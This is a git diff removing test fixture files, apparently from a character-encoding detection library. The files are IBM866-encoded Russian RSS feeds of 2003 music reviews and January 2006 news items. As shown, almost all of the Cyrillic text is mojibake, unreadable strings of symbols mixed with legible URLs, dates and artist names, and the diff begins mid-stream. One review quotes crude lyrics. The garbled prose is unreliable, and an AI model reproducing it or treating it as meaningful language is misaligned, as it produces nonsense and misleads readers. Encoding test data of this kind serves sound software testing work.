£®¢ן₪¨­כ, ב¢¨­¨­כ ¨ ¬ןב  ₪®¬ ט­¥© ¯ג¨זכ ¢ 2006 - 2009 £®₪ ו" (N 733 ®ג 5.12.2005 £.), ¯א¨§¢ ­­®¥ ®¡¥ב¯¥ח¨גל ¯®«­®¥ ¨ב¯®«ל§®¢ ­¨¥ ×¢®ג ­  ¨¬¯®אג ¯¥א¥ח¨ב«¥­­כו ¢¨₪®¢ ¯א®₪ד×ז¨¨. - - - -‘­¨¦ מגבן בג ¢×¨ ¯®ט«¨­כ ­  ב¢¨­¨­ד -http://money.rin.ru/content/news/?id=106312&from=rss -‘ 1 ן­¢ אן 2006 £®₪  ¢בגד¯ ¥ג ¢ ב¨«ד ¯®בג ­®¢«¥­¨¥ א ¢¨ג¥«לבג¢  ” " א¥£ד«¨א®¢ ­¨¨ ¨¬¯®אג  ב¢¨­¨­כ ¢ 2006 £®₪ד" (N 730 ®ג 05.12.2005 £.), דבג ­ ¢«¨¢ מי¥¥ בד¬¬ א­כ© ®¡ך¥¬ ¢¢®§  ¢ ®בב¨מ ב¢¨­¨­כ ¢ א §¬¥א¥ 476,1 גכב. - - - -‘¯®א¨גל £א ¬®ג­® ¨ ¯® ₪¥«ד -http://money.rin.ru/content/news/?id=106311&from=rss -‘ 1 ן­¢ אן 2006 £®₪  ¢בגד¯¨ג ¢ ב¨«ד ¯א¨× § ”¥₪¥א «ל­®© ג ¬®¦¥­­®© ב«ד¦¡כ "¡ ®ב¯ א¨¢ ­¨¨ ג ¬®¦¥­­כ¬¨ ®א£ ­ ¬¨ ¢בגד¯¨¢ט¨ו ¢ § ×®­­דמ ב¨«ד בד₪¥¡­כו  ×ג®¢  א¡¨גא ¦­כו בד₪®¢ ¢ ¯®אן₪×¥ ­ ₪§®א " (N 1080 ®ג 17 ­®ן¡אן 2005 £®₪ ). - - - - diff --git a/chardet/tests/IBM866/music.peeps.ru.xml b/chardet/tests/IBM866/music.peeps.ru.xml deleted file mode 100644 index f09112b..0000000 --- a/chardet/tests/IBM866/music.peeps.ru.xml +++ /dev/null @@ -1,112 +0,0 @@ - - - - - - ד§כ×  ­  PeePs.ru: א¥ז¥­§¨¨ - …¦¥₪­¥¢­®¥ ¬ד§כ× «ל­®¥ ¨§₪ ­¨¥ - http://music.peeps.ru - - - ד§כ×  ­  PeePs.ru - http://www.peeps.ru/banners/our/zn.gif - http://music.peeps.ru - 88 - 31 - - - - "SMASH!" - Freeway - http://music.peeps.ru/news/s/2003/03/19/1432.html - ” ×ג, חג® ¡כ¢ט¨¥ «¥¯®ב¥₪כ»,   ­כ­¥ «Smash!» ¢¢ «¨«¨בל ¢ ×®ג¥« ט®ד-¡¨§­¥ב  ¡« £®₪ אן ¯®¡¥₪¥ ¢ ¯א¥בג¨¦­®¬ ¬ד§כ× «ל­®¬ ×®­×דאב¥, ­¨ ×®¨¬ ®¡א §®¬ ­¥ ¯®§¢®«ן¥ג בג ¢¨גל ¨ו ¢ ®₪¨­ דא®¢¥­ל ב «„אד£¨¬¨ ¯א ¢¨« ¬¨», «®א­ן¬¨» ¨«¨ «” ¡א¨×®©». ‚®-¯¥א¢כו, «Smash!» ¯®מג ­   ­£«¨©ב×®¬, ¢®-¢ג®אכו, ¯®מג ¯א®בג® §₪®א®¢®! - - - - ‹˜€ ‘’ˆ€ 3 Artist : V / A - http://music.peeps.ru/news/s/2003/03/19/1431.html - ‚ב¥¬ ג¥«¥§א¨ג¥«ן¬,   ג ×¦¥ ג¥«¥§א¨ג¥«ל­¨ז ¬! « £®₪ אן ב¢®¥¬ד ב¡®א­¨×ד ¨ ¯א®£א ¬¬¥ «®«לט ן בג¨א× » €. « ו®¢ ₪ א¨ג ¢¥ב¥­­¥¥ ­ בגא®¥­¨¥!   ¬ בב®¢דמ «‘ג¨א×ד» ¯א¨£« ט¥­כ ₪®¬®ו®§ן©×¨ €«בד ב ¯¥ב­¥© «‚ח¥א », ‘¢¥ג  ב ו¨ג®¬ «‚ב¥-ג ×¨ ¬®¦­®»,  ט   ב¯דג¨­  ב «‘ד¬ בט¥₪ט¨¬ ₪®¦₪¥¬», ’ ­ן ד« ­®¢  ב גא¥×®¬ - - - - "BENEFIT" - http://music.peeps.ru/news/s/2003/03/19/1430.html - ‘«®¢® benefit ב  ­£«¨©ב×®£® ®§­ ח ¥ג «¯®«ל§ », «¢כ£®₪ ». “¦ ­¥ §­ מ, ­  ב×®«ל×® ¢כ£®₪­® ¡כ«® ¯א®₪מב¥א ¬ ₪דםג  ®בג ¢«ןגל ¯« בג¨­×ד ¡¥§ ­ §¢ ­¨ן, ­® ג®, חג® ב¨­£« «Sex Sells» ₪®«£® ­¥ ב¯®«§ « ב ג®¯-¯®§¨ז¨©, ן¢­® ­¥ ®בג ¢¨«® «Benefit» ¢ ¯א®¨£אכט¥. - - - - "…€ …‹‡ˆ" - ‘ד¯¥אב¨¬¥גאiן - http://music.peeps.ru/news/s/2003/03/19/1429.html - ¥א¢®¥, חג® ¡א®ב ¥גבן ¢ £« §  - ®¡«®¦×  ₪¨ב× : ׫ ¢¨ט¨ ה®אג¥¯¨ ­® ­  ח¥א­®¬ ה®­¥ - ¢¨₪¨¬®, םג® ¢כא ¦¥­¨¥ ג®© ב ¬®© «ב¨¬¬¥גא¨¨» ב ¯א¨בג ¢×®© «בד¯¥א», ®¡א §®¢ ­­®© ¢ ­ §¢ ­¨¨  «ל¡®¬ . ®, חג® ג ×®¥ בד¯¥אב¨¬¬¥גא¨ן? - - - - TLC 3D - http://music.peeps.ru/news/s/2003/03/19/1425.html - ®¢כ©  «ל¡®¬  ¬¥א¨× ­®× TLC 3D - ח¥ג¢¥אגכ© ¯® בח¥גד ¢ ₪¨ב×®£א ה¨¨ גא¨®. ‚ א¥§ד«לג ג¥ גא £¨ח¥ב×®© £¨¡¥«¨ ¢  ¢ג®× ג בגא®ה¥ ®₪­®© ¨§ דח בג­¨ז £אד¯¯כ ‹¨§כ Left Eye ‹®¯¥ב גא¨® ¯א¥¢א ג¨«®בל ¢ ₪דםג. Chilli ¨ T-Boz א¥ט¨«¨ ¯א®₪®«¦ גל ב®¢¬¥בג­דמ א ¡®גד ¡¥§ גא¥גל¥© דח בג­¨זכ, ­®, ¥בג¥בג¢¥­­®, חג® 3D ¯®ב¢ןי¥­ ¥¥ ¯ ¬ןג¨. - - - - DJ Tomekk - Beat Of Life, vol.1 - http://music.peeps.ru/news/s/2003/03/19/1424.html - „¨₪¦¥© ’®¬¥×× - ¬ בג¥א ¥¢א®¯¥©ב×®£® דא®¢­ן, ¢כבגד¯ ¢ט¨© ¢¬¥בג¥ ב ג ×¨¬¨ ג¨ג ­ ¬¨ אם¯ , × × RunDMC, Wu-tang Clan, LL Cool J ¨ KRS-One, ב₪¥« ¢ט¨© א¥¬¨×בכ ­  ¯¥ב­¨ Brandy, Fugees ¨ ₪ ¦¥ Jay-Z. ‚®ג ¨ ­®¢כ© ¥£®  «ל¡®¬ - Beat Of Life vol.1 - - - - Dieter Bohlen - Greatest Hits - http://music.peeps.ru/news/s/2003/03/19/1423.html - ‚כ¯די¥­­כ© ×®¬¯ ­¨¥© BMG ב¡®א­¨× «דחט¨ו ¯¥ב¥­ ¯¥¢ז , ×®¬¯®§¨ג®א  ¨ ¯א®₪מב¥א  „¨ג¥א  ®«¥­  - א ₪®בגל ₪«ן א®¬ ­ג¨ח­כו ¯®×«®­­¨ז ב« ₪×®£®«®ב®£® ­¥¬ז . „  ¨ ­¥ ג®«ל×® ₪«ן ­¨ו: ב¡®א­¨× ­¥¯א¨גן§ ג¥«ל­®© ¬¥«®₪¨ח­®© ¯®¯-¬ד§כר ®ג«¨ח­® ¯®₪®©₪¥ג ₪«ן ¢¥ח¥א¨­®× ב ג ­ז ¬¨. - - - - אדג® גכ ¯®¯ «. ”€ˆ€ ‡‚…‡„ - http://music.peeps.ru/news/s/2003/03/12/1366.html - ” ¡א¨ח­®¥ ¯א®¨§¢®₪בג¢® ­¥ בג®¨ג ­  ¬¥בג¥,   ¢כו®₪¨ג ­  ­®¢כ¥ א¥«לבכ - «§¢¥§₪ ­דגכ¥» «×אדג® ¯®¯ «¨» ג¥¯¥אל ­¥ ג®«ל×® ­  ג¢-ם×א ­, ­® ¨ ­  ×®¬¯ ×ג-₪¨ב×. ¥§ד«לג ג, £®¢®אןי¨© ב ¬ §  ב¥¡ן - «ה ¡א¨× » ¨¬.  ג¢¨¥­×® א ¡®ג ¥ג בג ¡¨«ל­® ¨ ¯א®₪ד×ג¨¢­®. - - - - "‡¢¥א¨" - "£®«®₪" - http://music.peeps.ru/news/s/2003/02/26/1293.html - 13 גא¥×®¢ ₪¥¡מג­®£®  «ל¡®¬  £אד¯¯כ «‡¢¥א¨» ¢ ז¥«®¬ ®בג ¢«ןמג ¯א¨ןג­®¥ ¢¯¥ח ג«¥­¨¥, ­® ¦¥ ¢א¥¬ן ­¥ ¯®×¨₪ ¥ג ®ידי¥­¨¥ ­¥×®ג®א®£® ®₪­®®¡א §¨ן. ƒ₪¥-ג® ­  ב¥א¥₪¨­¥ ¯א®ב«דט¨¢ ­¨ן ₪¨ב×  ¯®ן¢«ן¥גבן ®ידי¥­¨¥, חג® ¨£א ¥ג ®₪­  ¨ ג  ¦¥ ¯¥ב­ן - - - - Moral Codex - The best - http://music.peeps.ru/news/s/2003/02/26/1292.html - ‘¡®א­¨× The Best, ¢כ¯די¥­­כ© ה¨א¬®© CD Land ¢ 2002 £®₪ד, ¯א¥₪בג ¢«ן¥ג ב®¡®© ¯®₪¡®א×ד «דחט¨ו ו¨ג®¢ £אד¯¯כ «®א «ל­כ© ®₪¥×ב». „ד¬ ¥גבן, ¬םגאכ «®א «ל­כ© ®₪¥×ב» ¢ ®ב®¡®¬ ¯א¥₪בג ¢«¥­¨¨ ­¥ ­ד¦₪ מגבן. - - - - '’¥­ל - 64' - '¡אכ¢×¨ הא §' - http://music.peeps.ru/news/s/2003/02/26/1291.html - „¥¡מג­כ©  «ל¡®¬ £אד¯¯כ ¨§ ®¢®£® ב×®«  «’¥­ל - 64» ¯®₪ ­ §¢ ­¨¥¬ «¡אכ¢×¨ הא §» ®ג¬¥ח¥­ ¢ב¥®¡י¥© ¡®«¥§­למ ¬®«®₪כו א®בב¨©ברו ×®¬ ­₪: ¢א®₪¥ ¡כ ¨ £¨ג א­כ¥ ב®«® ¯א¨בדגבג¢דמג, ¨ ¢®× « ו®א®ט, ¨ ¨£א מג ­¥¯«®ו®, ¨ ¯¥ב­¨ ב®ח¨­ןמג ×א ב¨¢כ¥. - - - - Angelight - „¥ג¨ ×¥ ­  - http://music.peeps.ru/news/s/2003/02/23/1257.html - „®¬®א®יס­­כ¥ ­¥₪®¡א®¦¥« ג¥«¨ ¬ד§כר ­למ-ם©₪¦ ₪ ¢­® ד¦¥ ®×א¥בג¨«¨ ¥ס ­ד₪­®©, ®₪­®®¡א §­®© ¨ ¡¥בב¬כב«¥­­®©. ˆ םג® ­¥¢§¨א ן ­  ג®, חג® ב ¬כ© ¯®ב«¥₪®¢ ג¥«ל­כ© ¥ס א®בב¨©בר©  ₪¥¯ג Angelight ¯א¥ב«¥₪ד¥ג × ¦₪כ¬ ב¢®¨¬  «ל¡®¬®¬ ¢¯®«­¥ ×®­×א¥ג­כ¥ ז¥«¨. - - - - NOFX "Pump Up The Valuum" - http://music.peeps.ru/news/s/2003/02/11/1199.html - ®ו®¦¥, ₪®¡¨¢ט¨בל §¢¥§₪­®£® בג גדב , ¨ בג ¢ ב¢®¥£® א®₪  § ×®­®₪ ג¥«ן¬¨ ¦ ­א , NOFX א¥ט¨«¨ ¯®«­®בגלמ ¯®£אד§¨גלבן ¢ ₪דא ×®¢ «ן­¨¥ ¨ ב ¬®¯ א®₪¨א®¢ ­¨¥. ‹¨א¨×  ג¨¯ : «She's got a silicone cock sticking in her ass  one in her cunt» ¨«¨ «there's nothing finer than having a vagina» ¢אן₪«¨ ¯א¨₪¥גבן ¯® ¢×דבד דג®­ח¥­­כ¬ ¨­ג¥««¥×גד « ¬, ­® ח¥£® ¢כ ו®ג¥«¨, םג® ¦¥ ¢ב¥-ג ×¨ ¯ ­×-א®×. - - - - No Use For A Name "More Betterness" CD - http://music.peeps.ru/news/s/2003/02/11/1198.html - א®£א¥בב¨אדן ב × ¦₪כ¬ ­®¢כ¬  «ל¡®¬®¬ NUFN ¯®ו®¦¥ ₪®בג¨£«¨ ב®¢¥אט¥­בג¢ . ‚ ®ג«¨ח¨¥ ®ג ¡®«לט¨­בג¢  ®₪­®®¡א §­® ¢¥ב¥«כו ¯®¯-¯ ­× £אד¯¯, NUFN ׫ ₪דג ¢ ®ב­®¢כ ב¢®¥© ¬ד§כר £אדבג­כ¥ ¬¥«®₪¨¨, ×®ג®אכ¥ ¢ ב®ח¥ג ­¨¨ ¯א®­¨×­®¢¥­­כ¬ ¢®× «®¬ ¨ ¬ן£×¨¬ £¨ג א­כ¬ §¢ד×®¬ ¯א®¨§¢®₪ןג ­¥¨§£« ₪¨¬®¥ ¢¯¥ח ג«¥­¨¥. - - - - Good Riddance "Operation phoenix" CD - http://music.peeps.ru/news/s/2003/02/11/1197.html - “₪ ח­® ב®ח¥ג ן ג¨¯¨ח­® × «¨ה®א­¨©ב×דמ ¯ ­×®¢ב×דמ ¬¥«®₪¨ח­®בגל ב ד¯אד£¨¬ ו א₪×®א®¢כ¬ §¢דח ­¨¥¬ (¢ ¬ד§כ×¥) ¨ ב®ז¨ «ל­®-¯®«¨ג¨ח¥ב×דמ ג¥¬ ג¨×ד ב «¨ח­כ¬¨ ¯¥א¥¦¨¢ ­¨ן¬¨ (¢ ג¥×בג ו), GR ­¥ ¢ ¯¥א¢כ© א § ₪®× §כ¢ מג, חג® ן¢«ןמגבן ®₪­®© ¨§ ב ¬כו ב¨«ל­כו ¨ ­¥§ דאן₪­כו ¯ ­×-£אד¯¯ 90-ו. - - - - diff --git a/chardet/tests/IBM866/newsru.com.xml b/chardet/tests/IBM866/newsru.com.xml deleted file mode 100644 index 4dd32c8..0000000 --- a/chardet/tests/IBM866/newsru.com.xml +++ /dev/null @@ -1,351 +0,0 @@ - - - - -NEWSru.com -http://www.newsru.com -®¢®בג¨ -ru -NEWSru.com, all rights reserved -info@newsru.com -Wed, 4 Jan 2006 05:45:00 +0300 - - http://newsru.com/img/ntv.gif - NEWSru.com - http://www.newsru.com - 115 - 28 - - - - ‚ ’דאז¨¨ ¯ב¨ו¨ח¥בר ­¥§₪®א®¢כ© ¬ד¦ח¨­  ¢§®א¢ « ו«®¯דט×ד ¢ §₪ ­¨¨ ¨­מבג  - http://www.newsru.com/world/03jan2006/ankara.html - ˆ­ז¨₪¥­ג ¯א®¨§®ט¥« ­  ®₪­®¬ ¨§ םג ¦¥© §₪ ­¨ן ¨­מבג  ¢ €­× א¥, £₪¥ א ב¯®«®¦¥­® ד¯א ¢«¥­¨¥ ¨ב¯®«­¥­¨ן ­ × § ­¨©. ‚ ¯®«¨ז¨¨ ד¢¥אןמג, חג® ¯א®¨בט¥₪ט¥¥ ­¥ ן¢«ן¥גבן ג¥א ×ג®¬. ‚¨­®¢­¨× ¯א®¨בט¥בג¢¨ן § ₪¥א¦ ­. - ‚ ¬¨א¥ - Tue, 3 Jan 2006 19:57:00 +0300 - - - - - ‚ ƒˆ„„ ®¡¥י מג ­¥ טגא ה®¢ גל ¢ ן­¢ א¥ ¢®₪¨ג¥«¥© §  ­ אדט¥­¨ן ­®¢כו ¯א ¢¨« ₪®א®¦­®£® ₪¢¨¦¥­¨ן - http://www.newsru.com/russia/03jan2006/gibddnow.html - ‚ ¯¥א¢כ¥ ­¥₪¥«¨ ­®¢®£® £®₪  ב®גאד₪­¨×¨ ƒˆ„„ ¡ד₪דג «®ן«ל­® ®ג­®ב¨גלבן × ¢®₪¨ג¥«ן¬, ­¥ דב¯¥¢ט¨¬ ¢כדח¨גל ­®¢כ¥ ¯א ¢¨«  ₪®א®¦­®£® ₪¢¨¦¥­¨ן, ¢בגד¯¨¢ט¨¥ ¢ ב¨«ד ב 1 ן­¢ אן 2006 £®₪ . ˆ­ב¯¥×ג®א ¬ ƒˆ„„ ¯א¥₪¯¨ב ­® ®¡ךןב­¨גל ¢®₪¨ג¥«מ בדגל ­ אדט¥­¨ן ¨ ב₪¥« גל ¥¬ד ¯א¥₪ד¯א¥¦₪¥­¨¥. - ‚ ®בב¨¨ - Tue, 3 Jan 2006 19:22:00 +0300 - - - - - ‚ ˆא ×¥ א §¡¨«בן  ¬¥א¨× ­בר© ¢®¥­­כ© ¢¥אג®«¥ג: ₪¢®¥ ¯®£¨¡ט¨ו - http://www.newsru.com/world/03jan2006/heli.html - ® ₪ ­­כ¬ ¨א ×ב×®© ¯®«¨ז¨¨, ¢¥אג®«¥ג ד¯ « ¨«¨ ¡כ« ב¡¨ג ¢® ¢ג®א­¨× ¯א¨¬¥א­® ¢ 60 ר«®¬¥גא ו ב¥¢¥א®-¢®בג®ח­¥¥  £₪ ₪ . ‚ א¥§ד«לג ג¥ ¨­ז¨₪¥­ג  ¯®£¨¡«¨ ₪¢®¥ ¢®¥­­®ב«ד¦ י¨ו  א¬¨¨ ‘˜€. - ‚ ¬¨א¥ - Tue, 3 Jan 2006 18:58:00 +0300 - - - - - ®בב¨©בר¥ ג¥­­¨ב¨בגכ ­¥ד₪ ח­® בג אג®¢ «¨ ­  ד¡×¥ •®¯¬ ­  - http://www.newsru.com/sport/03jan2006/hopman.html - ‘¡®א­ ן ®בב¨¨ ¯® ג¥­­¨בד ¯א®¨£א «  ב¢®© בג אג®¢כ© ¬ גח ­  גא ₪¨ז¨®­­®¬ ­®¢®£®₪­¥¬ גדא­¨א¥ ד¡®× •®¯¬ ­  ב ¯א¨§®¢כ¬ ה®­₪®¬ ¬¨««¨®­ ₪®«« א®¢ ‘˜€, ×®ג®אכ© ¯א®ו®₪¨ג ¢  ¢בגא «¨©ב×®¬ £®א®₪¥ ¥אג. - ‘¯®אג - Tue, 3 Jan 2006 18:32:00 +0300 - - - - - - - ®£ גכ¥ א®בב¨ן­×¨ ₪¥« מג ®¡®א®ג ¨ ®¯א¥₪¥«ןמג בג¨«ל ¥¢א®¯¥©ברו ₪®¬®¢ ¬®₪כ - http://www.newsru.com/russia/03jan2006/women.html - א¥בגלן­בר¥ ¡«ד§כ, ¬­®£® ¬¥ו®¢ ¨ ¡א®בר¥ ד×א ט¥­¨ן - ¢ ­כ­¥ט­¥¬ ב¥§®­¥ ¡®£ גכ¥ א®בב¨ן­×¨ ₪¥« מג ®¡®א®ג ¨ ®¯א¥₪¥«ןמג בג¨«ל § ¯ ₪­כו ₪®¬®¢ ¬®₪כ. דבבר¥ ב ד₪®¢®«לבג¢¨¥¬ ¢כבג ¢«ןמג ב¢®¥ ¡®£ גבג¢® ­ ¯®× §, ¯¨ט¥ג S&#252;ddeutsche Zeitung. - ‚ ®בב¨¨ - Tue, 3 Jan 2006 17:53:00 +0300 - - - - - ‚® ”א ­ז¨¨ ב 4 ן­¢ אן ®ג¬¥­ן¥גבן חא¥§¢כח ©­®¥ ¯®«®¦¥­¨¥, ¢¢¥₪¥­­®¥ ¢ ב¢ן§¨ ב ¬ בב®¢כ¬¨ ¡¥ב¯®אן₪× ¬¨ - http://www.newsru.com/world/03jan2006/nochs.html - —א¥§¢כח ©­®¥ ¯®«®¦¥­¨¥ ¡כ«® ¢¢¥₪¥­® ¢® ”א ­ז¨¨ 8 ­®ן¡אן 2005 £®₪  ד× §®¬ ¯א¥§¨₪¥­ג  בגא ­כ ¢ ב¢ן§¨ ב ¬ בב®¢כ¬¨ ¡¥ב¯®אן₪× ¬¨ ¢ ¯א¨£®א®₪ ו  א¨¦ ,   21 ­®ן¡אן ¯ א« ¬¥­ג ¯א®₪«¨« ¥£® ₪¥©בג¢¨¥ ­  גא¨ ¬¥בןז . - ‚ ¬¨א¥ - Tue, 3 Jan 2006 17:09:00 +0300 - - - - - ‚ ˆא ×¥ ‚‚‘ ‘˜€ ®¡בגא¥«ן«¨ ¦¨«®© ₪®¬: ¯®£¨¡«  ב¥¬לן ¨§ 14 ח¥«®¢¥× - http://www.newsru.com/world/03jan2006/iraq.html - ® ב«®¢ ¬ ¯א¥₪בג ¢¨ג¥«ן ¨א ×ברו ¯א ¢®®וא ­¨ג¥«ל­כו ®א£ ­®¢, ®¡בגא¥«ד ב ¢®§₪דו  ¯®₪¢¥א£בן ¦¨«®© ₪®¬ ¢ £®א®₪¥  ©₪¦¨ ­  ב¥¢¥א¥ ˆא × . ‘¥¬לן ¨§ 14 ח¥«®¢¥×, ­ ו®₪¨¢ט ןבן ¢ ₪®¬¥, ¯®£¨¡« . ‚ א¥§ד«לג ג¥ ®¡בגא¥«  ¥י¥ גא¨ ח¥«®¢¥×  ¯®בגא ₪ «¨, ­¥ב×®«לר¬ ₪®¬ ¬ ­ ­¥ב¥­ די¥א¡. - ‚ ¬¨א¥ - Tue, 3 Jan 2006 16:38:00 +0300 - - - - - ‚ ¨­ב×¥ ¯® ¯®₪®§א¥­¨מ ¢ ה «לט¨¢®¬®­¥ג­¨ח¥בג¢¥ § ₪¥א¦ ­ בכ­ ד¡¨ג®© ¦דא­ «¨בגר —¥א× ב®¢®© - http://www.newsru.com/crime/03jan2006/minsk.html - ‚ ®ג­®ט¥­¨¨ בכ­  ד¡¨ג®© ¢ ×®­ז¥ 2004 £®₪  ¦דא­ «¨בגר ‚¥א®­¨×¨ —¥א× ב®¢®© €­ג®­  ”¨«¨¬®­®¢  ¨ ¥י¥ ­¥ב×®«לרו ¥£® §­ ×®¬כו ¢®§¡ד¦₪¥­® ד£®«®¢­®¥ ₪¥«® ¯® בג. 221 "ˆ§£®ג®¢«¥­¨¥, וא ­¥­¨¥ «¨¡® ב¡כג ה «לט¨¢כו ₪¥­¥£ ¨«¨ ז¥­­כו ¡ד¬ £". - א¨¬¨­ « - Tue, 3 Jan 2006 15:39:00 +0300 - - - - - ¥הגן­כ¥ ז¥­כ ¢כא®ב«¨ ¨§-§  £ §®¢®£® ×®­ה«¨×ג  - http://www.newsru.com/finance/03jan2006/oil.html - –¥­כ ­  ­¥הגל ­  ®ב­®¢­כו ¬¨א®¢כו ¡¨א¦ ו ¢כא®ב«¨ ¨§-§  ®§ ¡®ח¥­­®בג¨ גא¥©₪¥א®¢ א®בב¨©ב×®-ד×א ¨­בר¬ £ §®¢כ¬ ×®­ה«¨×ג®¬.   למ-‰®א×ב×®© NYMEX ¡ אא¥«ל ¯®₪®א®¦ « ­  2,16 ₪®«« א  - ₪® 63,2 ₪®«« א  §  ¡ אא¥«ל. - ×®­®¬¨×  - Tue, 3 Jan 2006 15:28:00 +0300 - - - - - - - ‚ —¥«ן¡¨­ב×¥ ¬¥בג­כ© ¦¨ג¥«ל גא¥¡ד¥ג ®ג בד₪  א §®¡א גלבן, ®ג ×®£® ®­ ¯א®¨§®ט¥«: ®ג €₪ ¬כ ¨ …¢כ ¨«¨ ®ג ®¡¥§לן­כ - http://www.newsru.com/russia/03jan2006/sered.html - †¨ג¥«ל —¥«ן¡¨­ב×  ‚ ב¨«¨© ‘¥א¥₪®­¨­, ¢כבגד¯ מי¨© ®ג¢¥גח¨×®¬ ¢ ®₪­®¬ ¨§ בד₪¥¡­כו ¯א®ז¥בב®¢, ו®₪ ג ©בג¢®¢ « ®¡ ®ג¢®₪¥ בד₪ל¨, ¬®ג¨¢¨אדן םג® ג¥¬, חג® ®¡  ®­¨ ¯א®¨§®ט«¨ ®ג €₪ ¬  ¨ …¢כ, ג® ¥בגל ן¢«ןמגבן א®₪בג¢¥­­¨× ¬¨. ­ בח¨ג ¥ג, חג® בד₪ ₪®«¦¥­ ¯א®ןב­¨גל םג®ג ¢®¯א®ב. - ‚ ®בב¨¨ - Tue, 3 Jan 2006 15:15:00 +0300 - - - - - ƒאד§¨­ ב ­®¦®¬  ג ×®¢ « 20-¬¥גא®¢דמ ­ ₪ד¢­דמ ב®¡ ×ד ­  £« ¢­®© ¯«®י ₪¨ ‡ד£₪¨₪¨ (”’) - http://www.newsru.com/world/03jan2006/knifer.html - ’¥¬דא ®¡ «¨ן ­¥ב×®«ל×® א § ¯א®ג×­ד« ב®¡ ×ד ­®¦®¬, ¯®ב«¥ ח¥£® ¡כ« § ₪¥א¦ ­ ¯®«¨ז¨¥©. ­ ­¥ ב¬®£ ₪ גל ¢­ןג­®£® ®¡ךןב­¥­¨ן ב¢®¥¬ד ¯®בגד¯×ד. …¬ד £א®§¨ג גא¨ £®₪  גמאל¬כ. - ‚ ¬¨א¥ - Tue, 3 Jan 2006 14:52:00 +0300 - - - - - - - - - ‚  ¨א¥ ®¡אדט¨«¨בל ­¥ב×®«ל×® ¦¨«כו ₪®¬®¢: ¯®£¨¡«¨ 3 ח¥«®¢¥× , 4 ¯®«דח¨«¨ א ­¥­¨ן - http://www.newsru.com/world/03jan2006/cairo.html - ˆ§-§  ®¡אדט¥­¨ן ט¥בג¨- ¨ גא¥וםג ¦­®£® ¦¨«כו ₪®¬®¢ ¢ בג®«¨ז¥ …£¨¯ג  § ¢ « ¬¨ ®× § «בן ¯¥א¥×אכג ¯®₪ך¥§₪ ₪«ן ג¥ו­¨×¨. א¨ח¨­®© ®¡אדט¥­¨ן ₪®¬®¢ בג «® ג®, חג® ¬¥בג­כ¥ ¦¨ג¥«¨ בגא®ןג ¨ו ¨§ ב ¬®₪¥«ל­®£® רא¯¨ח , ¨§£®ג®¢«¥­­®£® ¨§ ¯א¥בב®¢ ­­®£® ¬דב®א . - ‚ ¬¨א¥ - Tue, 3 Jan 2006 14:37:00 +0300 - - - - - ®בב¨ן­¥ ­ §¢ «¨ ב ¬כ¥ ¨­ג¥א¥ב­כ¥ ה¨«ל¬כ, ×­¨£¨, ¦דא­ «כ ¨ ג¥«¥¯¥א¥₪ ח¨ ¢ 2005 £®₪ד - http://www.newsru.com/cinema/03jan2006/best.html - “ח בג­¨×¨ ®¯א®ב , ¯א®¢¥₪¥­­®£® €­ «¨ג¨ח¥בר¬ ז¥­גא®¬ א¨ן ‹¥¢ ₪כ, ¯®¯כג «¨בל ­ §¢ גל ב ¬כ© ¨­ג¥א¥ב­כ© ה¨«ל¬, ×­¨£ד, ג¥«¥¯א®£א ¬¬ד ¨ ¦דא­ «. א¨¬¥ח ג¥«ל­®, חג® ®ב­®¢­®© ®ג¢¥ג ­  ¢ב¥ 4 ¢®¯א®ב  - "§ גאד₪­ןמבל ®ג¢¥ג¨גל". - ד«לגדא  - Tue, 3 Jan 2006 14:22:00 +0300 - - - - - - - ‚ ­®¢®¬ £®₪ד ­  ‘ ¬®£דג ®ג¬¥­¨גל "בדו®© § ×®­" - http://www.newsru.com/russia/03jan2006/mks.html - -“¦¥ ¯ןגל «¥ג ב ¬®¬¥­ג , ×®£₪  ‘ בג «  ®¡¨ג ¥¬®©, ­  ­¥© ₪¥©בג¢ד¥ג ¦¥בג®ח ©ט¨© § ¯א¥ג ­   «×®£®«ל. ® ב«דו ¬, ¯¥א¢כ¬ ¯®ב« ¡«¥­¨¥¬ בג «  ₪®בג ¢×  ­  ¡®אג ט®×®« ₪­כו ×®­ה¥ג ב «¨×¥א®¬. ® ₪ ¦¥ םג® ®ה¨ז¨ «ל­® ¯®₪ג¢¥א₪¨גל ­¥¢®§¬®¦­®, ¢¥₪ל ­ אדט¨ג¥«ן¬ £א®§¨ג ­¥¬¥₪«¥­­®¥ ד¢®«ל­¥­¨¥. - ‚ ®בב¨¨ - Tue, 3 Jan 2006 13:48:00 +0300 - - - - - - - Maariv: “ב ¬  ¡¥­ ‹ ₪¥­ ד¦¥ 3 £®₪  ¦¨¢¥ג ¢ ˆ§א ¨«¥ - http://www.newsru.com/world/03jan2006/laden.html - -ƒא ¦₪ ­¨­ €ה£ ­¨בג ­  “ב ¬  ¡¥­ ‹ ₪¥­ ¢ך¥ו « ¢ ˆ§א ¨«ל ¯® גדא¨בג¨ח¥ב×®© ¢¨§¥ ח¥א¥§ £®₪ ¨ גא¨ ₪­ן ¯®ב«¥ ג¥א ×ג®¢ 11 ב¥­גן¡אן 2001 £®₪  ¢ ‘˜€, ¯¥א¥₪  ¬¥א¨× ­בר¬ ¢ג®א¦¥­¨¥¬ ¢ ˆא ×. …£® ¢כ¥§₪ ¨§ ˆ§א ¨«ן ­¥ ¡כ« § ה¨×ב¨א®¢ ­. - ‚ ¬¨א¥ - Tue, 3 Jan 2006 13:32:00 +0300 - - - - - ®בב¨ן­¥ ­ §¢ «¨ ב ¬כו ד¬­כו, ב¬¥«כו ¨ ב¥×בד «ל­כו ¯®«¨ג¨×®¢ בגא ­כ - http://www.newsru.com/russia/03jan2006/politics.html - €­ «¨ג¨ח¥בר© ז¥­גא א¨ן ‹¥¢ ₪כ ¯א®¢¥« ®¯א®ב בא¥₪¨ א®בב¨ן­ ¢ ×®­ז¥ 2005 £®₪ . ¥ב¯®­₪¥­גכ ®ג¢¥ג¨«¨ ­  ¢®¯א®בכ ® ב ¬כו ח¥בג­כו, ב¬¥«כו, ד¬­כו ¨ ב¥×בד «ל­כו ¯®«¨ג¨× ו. ˆ¬¨ בג «¨ דג¨­ ¨ †¨א¨­®¢בר©. א®¬¥ ג®£®, א®בב¨ן­¥ ­ §¢ «¨ ®¬ ­  €¡א ¬®¢¨ח  ב ¬כ¬ ¡®£ גכ¬ ח¥«®¢¥×®¬ בגא ­כ. - ‚ ®בב¨¨ - Tue, 3 Jan 2006 13:05:00 +0300 - - - - - - - - ‚ Windows ­ ©₪¥­  ®¯ ב­ ן דן§¢¨¬®בגל, ד£א®¦ מי ן ¯®חג¨ ¢ב¥¬ ×®¬¯למג¥א ¬ ­  ¯« ­¥ג¥ - http://www.newsru.com/world/03jan2006/windows.html - ‹מ¡®© 